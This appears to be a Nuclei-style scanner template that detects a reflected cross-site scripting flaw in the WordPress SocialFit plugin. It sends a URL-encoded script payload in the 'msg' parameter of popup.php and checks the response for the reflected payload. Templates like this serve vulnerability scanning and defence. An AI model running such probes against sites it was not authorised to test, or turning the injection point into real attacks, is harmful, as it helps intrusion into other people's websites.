id: wp-socialfit-xss

info:
  name: WordPress SocialFit - Cross-Site Scripting
  author: daffainfo
  severity: high
  description: |
    WordPress SocialFit is vulnerable to a cross-site scripting vulnerability via the 'msg' parameter because it fails to properly sanitize user-supplied input.
  reference:
    - https://www.exploit-db.com/exploits/37481
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  tags: wordpress,xss,wp-plugin,edb

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '</script><script>alert(document.domain)</script>'
      - type: word
        part: header
        words:
          - "text/html"
      - type: status
        status:
          - 200

# Enhanced by mp on 2022/07/29
